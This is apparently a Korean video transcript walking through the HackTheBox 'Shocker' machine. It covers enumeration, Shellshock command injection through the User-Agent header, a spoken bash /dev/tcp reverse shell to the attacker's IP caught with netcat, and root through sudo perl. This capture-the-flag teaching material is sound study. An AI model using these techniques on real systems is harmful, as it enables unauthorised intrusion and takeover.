네, 안녕하세요. 반갑습니다. 그루트 시큐리티의 초이입니다. 오늘은요, 헥터박스 플랫폼의 쇼커라는 박스를 한번 풀어보도록 하겠습니다. 10, 5, 6이고요. 바로 한번 시작해보죠. 자, 그러면은 바로 엠맵 가장 많이 나오는 포트 1000개 두 번씩만 두들기면서 호스트 디스커버리 안 하고 DNS 레졸루션 안 하고 오픈된 포트만 최소 1000 패킷 per second로 보내서 TCP 풀에다가 아웃풋을 해놨습니다. 이미 시간이 너무 오래 걸리기 때문에요. 이미 돌려놨고요. 보니까 포트 80과 포트 2222가 나오게 됩니다. 그러면 이제 또 궁금해지죠? 그러면은 포트 80과 2222를 상대로 서비스 배너 그래빙 그리고 기본 엠맵 스크립트 등등을 해서 TCP 디테일드로 실행을 하겠습니다. 그러면은 이제 또 나왔죠. 그러면은 이것도 역시 시간이 너무 오래 걸리기 때문에 이미 한번 돌려놨습니다. 포트 80에는 아파치 그냥 기본적인 웹서버가 돌아가고 있고 포트 2222에는 아주 신기하게도 오픈SSH 7.2가 돌아가고 있습니다. 물론 오픈SSH로 뭔가를 할 수는 있겠지만은 일단 웹이 궁금하기 때문에 웹으로 한번 가보도록 하겠습니다. 그러면 여기에다가 10, 5, 6을 치고 한번 웹서버로 가보면은 뭐 don't bug me 라고만 나오고 나를 뭐 귀찮게 하지 마 이렇게 하고 이렇게 뭐 이미지가 나오는데요. 뭐 컨트롤 U를 눌러서 이제 소스 코드 보기를 보면은 뭐가 없습니다. 그죠? 그러면은 다시 한번 확인해 볼게. robots.txt를 가도 뭐가 없습니다. 그러면은 사실 웹서버가 있고 SSH 서버는 뭔가 재미가 없기 때문에 일단 웹서버에서 뭔가 한번 진행을 해보도록 하겠습니다. 그러면 10, 5, 6 이렇게 하고 워드리스트 같은 경우는 뭐 사실 아무거나 써도 되는데 저 같은 경우는 많이 쓰는 게 여기 덜버스터 그리고 다이렉토리 리스트 2.3 스몰 저는 요거를 많이 씁니다. 그리고 택 F를 누르면은 모든 리퀘스트에다가 예를 들어서 뭐 10, 5, 6 슬래시 뭐 하이면은 여기 뒤에다가 이제 슬래시를 또 붙여줍니다. 가끔씩 이렇게 이제 디렉토리 뒤에다가 꼭 슬래시를 붙여야지 그 디렉토리가 보여지는 그런 웹서버들도 있기 때문에 요렇게 해서 한번 실행을 해보도록 하겠습니다. 스레드는 50을 주겠고요. 그러면은 벌써 이렇게 두 가지의 이제 디렉토리가 나오게 됩니다. 물론 더 나올 수 있겠지만 일단 요 두 개에서 한번 끊고 지나가도록 하겠습니다. 일단 박스도 그렇고 이 CGI bin이라는 디렉토리가 굉장히 흥미롭거든요. 이 CGI라는 것 자체는 이제 거의 한 15년, 20년 전쯤에 이제 뭔가 웹서버에서 외부 스크립트를 돌릴 때 많이 사용을 하던 그런 기술이다 라고 보시면 되겠습니다. 그럼 저희 같은 경우 CGI가 조금 궁금하기 때문에 여기에다가 CGI tag bin 이렇게 슬래시를 놓고 그 다음에 여기에다가는 CGI에서 많이 사용되는 이제 스크립트 종류들이 있습니다. 예를 들어서 쉘 스크립트도 많이 사용을 하고 파이썬도 많이 사용을 하고요. 펄도 많이 사용을 하고 그리고 이제 .cgi도 많이 사용을 하기 때문에 이렇게 한번 진행을 해보도록 하겠습니다. 그럼 여기에 있는 모든 워드 리스트 뒤에다가 뭐 sh나 아니면 .py, .perl, .cgi 요거를 붙여서 이제 디렉토리 브루트 포싱을 진행을 한다 라고 보시면 되고 지금 같은 경우도 원래 슬래시 유저를 이제 고버스터에서 디렉토리 브루트 포싱을 하다가 제가 야 여기 파일 확장자에 shpy 그리고 pl cgi를 넣어서 같이 요것도 브루트 포싱 해줘 라고 하니까 슬래시 user.sh가 나왔습니다. 궁금하니까 한번 방문을 해보도록 하겠습니다. 슬래시 user.sh가 아니라 cgi tag bin 그리고 user.sh를 가면은 뭔가 CGI가 하는 것, 그러니까 이제 CGI 같은 경우는 파일 시스템 위에 있는 뭔가 스크립트를 실행을 하는데 요 user.sh라는 쉘 스크립트를 실행을 해서 현재 업타임을 보여주고 있는 것 같습니다. 요 같은 경우는 아마 여기에도 있을 것 같은데 네, 요 업타임을 치면은 지금 현재 이 머신이 뭐 몇 초 동안 몇 시간 동안 업타임이 돼 있느냐 요거를 이제 보여주는 이제 쉘 커맨드라고 보시면 되겠는데 요거를 지금 웹서버에서 실행을 하고 있는 거죠. CGI를 이용을 해서. 그러면은 이제 요것과 관련된 취약점이 있습니다. 바로 쉘쇼크라는 취약점인데요. 이 취약점 같은 경우는 나온 지 꽤나 오래됐습니다. 한 2014년도에 나왔을 거예요. 그래서 쉘쇼크 vulnerability 이렇게 이제 구글에다가 치면은 나오는데 일단 요 쉘쇼크에 관련된 조금 기술적인 내용 전에 이게 실제로 쉘쇼크에 취약하냐 안 취약하냐를 한번 엠맵을 통해서 찾아보도록 하겠습니다.
그래서 mmap 같은 경우는 mmap 스크립트들 많이 사용을 해보셨을 거예요, 그죠? mmap 스크립트 같은 경우는 이제 칼리 리눅스 기준으로 이제 user share mmap 스크립트 여기 가면은 이제 우리가 사용을 하는 많은 종류의 이 mmap 스크립트들이 있는데 여기서 혹시 쉘쇼크 관련된 게 없을까라고 찾아보면은 바로 요 이제 mmap 스크립트가 나오게 됩니다. http tag shellshock라는 이게 나오는 거죠. 그럼 요게 조금 궁금하니까 구글에서 한번 찾아보도록 하죠. 그럼 http tag shellshock 그리고 mmap 이렇게 치면은 이제 요 스크립트에 관련된 조금 더 자세한 내용이 나오게 됩니다. 바로 이렇게 나오는데요. 바로 mmap 뭐 shellshock vulnerability를 이제 뭐 정보를 수집을 해주는 그런 이제 스크립트다라는 게 나오고 여기 스크립트 argument라는 게 있습니다. 스크립트에 보낼 우리 뭐 argument를 우리나라 말로 뭐라 하죠? 뭐 임자라고 하던가요? 뭐 어쨌든 그런 것들인데 여기 보니까 뭐 .uri도 있고 .header도 있고 .cmd도 있고 기타 등등 많이 있습니다. 저희 같은 경우는 .uri를 조금 이제 지정을 해줄 거예요. 왜냐면 기본적으로 슬래시인데 저희 같은 경우는 슬래시가 아니라 슬래시 cgi tag빈 슬래시 user.sh 여기를 이제 집중적으로 저희가 정보 수집을 하고 싶기 때문에 이렇게 포트 80을 하고 이제 스크립트 자체는 http shellshock 요거였죠. 그리고 스크립트 args를 한 다음에 uri equals /cgi bin /user.sh 라고 한 다음에 10.10.10.56 그리고 뭐 tag 오픈 요 정도로만 진행을 해주시면 되겠습니다. 그렇게 해서 이제 요 포트 80에 돌아가는 웹서버에서 이제 요 URI에서 요게 과연 쉘쇼크에 취약하냐 안 취약하냐라고 물어보면은 mmap에서 요거는 쉘쇼크에 취약합니다 라고 이제 결과값을 반환을 해주게 되는 겁니다. 저는 개인적으로 여기서 mmap이 어떻게 정확히 요거를 이제 체크를 하는지 궁금해가지고 한번 간단하게나마 확인을 해보도록 하겠습니다. 자, 그러면은 요게 이제 mmap 스크립트인데요. 뭐 쭉쭉쭉쭉 많이 있지만은 이제 쭉 내려와서 이 mmap 스크립트가 어떻게 확인을 하느냐라고 하면은 바로 여기에 있습니다. generate http request라는 이 함수 안에 이 mmap 스크립트가 실제로 어떤 페일로드를 사용을 해서 쉘 스크립트에 취약한지 안 취약한지를 알아보는 그런 이제 페일로드를 이제 설명을 해주는 그런 함수가 있다라고 보시면 되겠는데 여기 커맨드라고 하는 거 보니까 바로 여기에서 시작이 되는 것 같네요. 그죠? 요 이제 echo tag n, echo tag s라고 해가지고 이제 요 랜덤을 여기에다가 집어 넣어주고 있고요. 그리고 더 내려가면은 요게 바로 쉘 스크립트, 쉘쇼크 페일로드라고 보시면 되겠습니다. 그래서 이 페일로드가 CMD 안에 들어가고 이 CMD가 어디에 들어가느냐? 유저 에이전트, 리퍼럴, 그리고 쿠키라는 이 HTTP 헤더 안에 이 CMD, 이 페일로드를 집어넣어 가지고 보내고 있다라고 보시면 되겠습니다. 그럼 조금 궁금하니까 뭐 메타스플로이트 이런 거 말고 저희가 한번 수동으로 직접적으로 한번 해보죠. 그러면은 일단은 인터셉트를 켜주시고 버프 스위트를 킨 다음에 여기에서 엔터를 눌러주신 다음에 요 이제 이 HTTP 리퀘스트를 인터셉트를 해줍니다. 그 뒤에는 리피터로 보내시면 되겠고 이렇게 샌드를 누르면은 뭐 기본적으로 이렇게 나오겠죠. 자, 그러면 아까 전에 저희가 봤던 mmap에서 이 mmap 페일로드를 한번 실행을 해보죠. mmap에 이제 쉘쇼크 페일로드를 한번 실행을 해볼 거예요. 그래서 이제 확인을 하게 되면은 요 페일로드가 먼저 들어가고 그 다음에 요게 들어가는 것 같습니다. 그죠? 그래서 요 페일로드를 먼저 한번 실행을 해 볼게요. 그리고 요 페일로드가 정확히 어떤 뜻인지도 조금 이따가 설명을 해드리도록 하겠습니다. 그런 다음에 요거 rand1은 뭐 랜덤 알파벳이니까 아무거나 줘도 되는 거겠죠? 오케이. 그러면은 여기에다가는 뭐 please subscribe. 네, 제발 구독을 해주세요 라는 요 페일로드를 한번 진행을 해보도록 하겠습니다. 요거 더블 코트는 지워주고요. 네, 요렇게 하게 되면은 네, 이렇게 이제 코드 엑스큐션이 일어났다 라고 뭐 정확하게는 커맨드 엑스큐션이죠. 왜냐하면 bash shell 커맨드를 이용을 하는 거니까 어쨌든 간에 요렇게 일어났다라고 보시면 되겠고 뭐 예를 들어서 여기에다가 groot 뭐 security 뭐 요렇게 치게 되면은 groot security라는 이제 커맨드 인젝션이 일어났다라고 보시면 되겠습니다. 그래서 정확히 쉘쇼크가 뭐 하는 이제 취약점이냐라고 보시면은 이 bash 우리가 현재 사용을 하고 있는 요 bash에는 이제 environment variable이라고 해서 이제 환경 변수를 지정을 해줄 수가 있습니다. 예를 들어서 여기에서 groot 한 다음에 security 이렇게 하면은
이제 환경 변수가 이렇게 추가가 되는 거죠. groot라는 환경 변수에는 security라는 뭐 문자열이 들어간다라고 보시면 되겠습니다. 근데 이 쉘 쇼크에서는 환경 변수를 지정을 해줄 때 이제 우리가 여기에다가 함수를 지정을 할 수도 있습니다. 그러니까 환경 설정을 지정을 할 때 문자열로만 지정을 하는 게 아니라 그 변수 안에 함수 자체를 집어넣는 것이죠. 그래서 예를 들어서 이런 이제 방식으로 함수를 지정을 해준 다음에 그 뒤에다가 이제 뭔가 이 쉘에서 사용이 될 수 있는 이런 커맨드를 넣어주면은 이렇게 이제 환경 변수도 지정이 되고 그 뒤에 이제 echo high라는 이 쉘 커맨드가 같이 실행이 되는 겁니다. 근데 요거 자체는 사실 이제 쉘 안에서는 너무나도 당연한 거거든요. 요 이제 세미콜론이라든지 아니면 뭐 end라든지 이런 거는 뭐 혹은 or라든지 이런 거는 이제 메타 캐릭터로 쉘 안에서는 너무나도 당연하게 이제 실행이 되는 겁니다. 요렇게 되는 경우 이제 세미콜론을 중간에다가 넣으면은 요게 먼저 실행이 되고 그 다음에 에코가 실행이 된다. 요건 이제 너무나도 당연한 건데 그래서 요 쉘에서는 너무나도 이게 당연한 건데 이 웹 서버들에서는 그게 아니라는 거죠. 그러니까 이 웹 서버들에서는 환경 변수가 유저 에이전트로 들어가게 됩니다. 그러니까 요 유저 에이전트라는 게 환경 변수로 들어가서 CGI 스크립트를 실행을 할 때 이 유저 에이전트도 이제 요 유저 에이전트 환경 변수도 같이 실행이 되는 건데 요런 이제 메타 캐릭터를 써서 두 가지의 커맨드를 실행을 하는 것은 쉘 상에서는 너무나도 당연한 일이지만 웹 서버는 그렇게 되면 안 된다라는 겁니다. 네, 웹 서버에서 이제 CGI 스크립트를 실행을 할 때 환경 변수를 지정을 하면 그냥 그 환경 변수가 지정이 돼야 되는 건데 여기에다가 이제 추가적으로 커맨드를 집어넣으면은 웹 서버는 쉘이 아니기 때문에 이거를 실행을 하면 안 되는데 그게 실행이 된다. 그렇기 때문에 그게 취약점이다. 라는 것을 이제 2014년도에 누군가가 발표를 해서 이제 쉘 쇼크 취약점이라는 이름이 붙은 거죠. 그래서 저희 같은 경우는 여기에서 환경 변수를 지정을 할 때 바로 이 user agent라는 환경 변수를 지정을 해주고 있는 거고 이 환경 변수는 이제 CGI bin 그리고 user.sh라는 쉘에 같이 들어가면서 이제 이 환경 변수가 이제 지정이 됩니다. 그래서 이 환경 변수에다가 함수를 이제 집어다 넣고 그 함수 이후에 이제 요런 이제 메타 캐릭터들이 이용을 해가지고 추가적으로 커맨드 엑스큐션을 진행을 할 수도 있습니다. 자, 그러면은 뭐 에코 같은 거는 뭐 되게 재밌는데 저희가 또 무엇을 할 수 있을 것이냐? 뭐 예를 들어서 여기에서 뭐 에코 이렇게 한 다음에 hello world 뭐 이렇게 하면 이제 뭐 에코가 되는데, 그죠? 이렇게 에코가 나오는데 뭐 그것도 좋지만은 여기에다가 뭐 리버스 쉘을 받을 수도 있겠죠. 그래서 예를 들어서 bin bash tag I 이렇게 하고 def tcp 그리고 저희 IP 주소가 뭐였죠? 10, 10, 14, 13, 10, 10, 14, 13 이렇게 하고 포트는 443을 주겠고요. 그런 다음에 요렇게 요렇게 진행을 해주도록 하겠습니다. 그런 다음에 저희는 요 이제 리버스 쉘을 받을 거니까 포트 443을 열어서 넷캣을 열어주면 되겠고 요거를 실행을 하게 되면은 아무것도 안 되죠. 네, 행이 됩니다. 그와 동시에 저희에게 이렇게 쉘이 들어오게 됩니다. 이 쉘 같은 경우는 지금 현재 넷캣 쉘로 이제 full TTY가 아닙니다. 요거를 이제 뭐 semi interactive TTY 쉘이라고 불리는데 요 쉘의 단점은 예를 들어서 탭 컴플리션이 안 돼요. hello 뭐 이렇게 하면은 이제 탭 컴플리션이 안 되고 컨트롤 C도 안 됩니다. 컨트롤 C를 눌러버리면은 넷캣 쉘이 죽어버리죠. 그래서 저희는 요 이제 불완전한 넷캣 쉘을 full TTY로 바꾸는 방법을 사용을 할 겁니다. 요 같은 경우는 이제 좀 테크니컬한 설명을 드리면은 너무 시간이 오래 걸리기 때문에 일단은 그냥 요렇게 진행만 한다라고 보시면 되겠습니다. 그래서 파이썬 3를 이용을 해서 pty 이제 sudo tty를 열어주고요. 그 다음에 컨트롤 Z를 누르고 stty raw tag echo 그리고 fg 이렇게 한 다음에 여기에서 조금 이제 뭔가 쉘이 부서진 것 같죠? 네, 근데 여기에서는 그냥 reset을 누른 다음에 터미널 타입은 xterm으로 눌러주면은 여기서부터는 이제 거의 완벽한 쉘이 됩니다. 그래서 컨트롤 C도 할 수 있고 cat user 한 다음에 탭을 누르면은 탭 completion도 되고 이제 interactive full TTY 쉘을 저희가 얻어냈다라고 보시면 되겠습니다. 그럼 일단 저희 ID 같은 경우는 쉘리라는 유저에 있고요. 그렇게 되면은 뭐 여기로 간 다음에 여기에 뭐 user.txt 플래그가 있겠죠. 그런 다음에는 이제 로컬
그 권한 상승을 진행을 해야 되는데 뭐 권한 상승을 할 수 있는 방법은 너무나도 많겠지만은 일단 저희 같은 경우는 클리어가 안 되네요. 뭐 어쨌든 저희 같은 경우는 뭐 sudo를 한번 실행을 해보겠습니다. 그러면 이 유저는 sudo 권한으로 사용을 할 수 있는 sudo 권한을 사용을 할 때 비밀번호를 주지 않고 사용을 할 수 있는 이 커맨드가 하나 있는데 그게 바로 perl이다 라는 것을 반환을 해주게 됩니다. 그러면은 여기에서 저희가 할 것은 이제 GTFO-bins라는 프로젝트를 이용을 해서 특정한 커맨드, 예를 들어서 저희 같은 경우는 현재 perl이라는 커맨드가 있는데 이 커맨드를 우리가 sudo 권한으로 사용을 할 수 있을 때 그것을 로컬 권한 상승에 어떻게 악용을 할 수 있느냐 라는 것을 알려주는 게 바로 이 프로젝트다 라고 보시면 되겠습니다. GTFO-bins 라고 치시면은 나오게 되겠고요. 뭐 sudo뿐만 아니라 뭐 SUID도 있고 뭐 파일 업로드 다운로드도 있고 되게 많이 있습니다. 그래서 저희 같은 경우는 perl을 검색을 해보고 perl 중에서도 이제 sudo로 사용을 할 수 있으니까 요거를 누르겠습니다. 그러면은 sudo로 perl을 사용을 할 수 있을 때 이제 perl의 exec이라는 것을 이용을 해서 그냥 이렇게 shell을 이제 실행을 하면은 sudo 권한으로, 그러니까 이 경우에는 루트 권한으로 shell을 실행을 할 수가 있다더라 라고 나오게 됩니다. 그래서 실제로 이렇게 perl을 sudo 권한을 이용을 해서 이런 식으로 새로운 쉘을 생성을 하면은 sudo 권한을 가진 채로 새로운 쉘이 생성이 되고 그 쉘에서는 저희가 루트 권한을 가지고 있다 라고 보시면 되겠습니다. 그럼 여기에서 루트 플래그까지 캣을 할 수가 있게 되겠고요. 이렇게 해서 쇼커라는 박스를 풀어보게 되었습니다. 네, 이 쇼커 같은 경우는 쉘 쇼크를 이용을 해서 커맨드 엑스큐션을 이뤄냈고 커맨드 엑스큐션이 일어난 다음에는 이제 리버스 쉘을 받아가지고 저희가 커맨드 엑스큐션을 통해서 리버스 쉘을 받았습니다. 그 리버스 쉘을 받은 다음에는 이제 full TTY 이제 뭔가 이 기법을 이용을 해가지고 fully interactive TTY 이 쉘을 새롭게 저희가 생성을 했고 그 새롭게 생성을 한 이 쉘에서 sudo tech L을 쳐보니 이 셸리라는 유저는 sudo 권한을 가지고 루트 권한으로 이 perl이라는 커맨드를 실행을 할 수 있더라 라는 것을 알아냈고 그것을 통해서 이제 GTFO-bins를 찾아보니 이 sudo 권한으로 perl을 실행을 할 때 바로 이렇게 실행을 하면은 새로운 쉘을 이제 시작을 해가지고 이 sudo 권한을 가진 채로 이 쉘을 시작을 할 수가 있다. 그래서 새로운 쉘이 시작이 됐고 그 쉘에서 우리가 아이디를 쳐보니 루트 권한이 나왔다 라고 보시면 되겠습니다. 감사합니다. 그루트 시큐리티의 초이였습니다.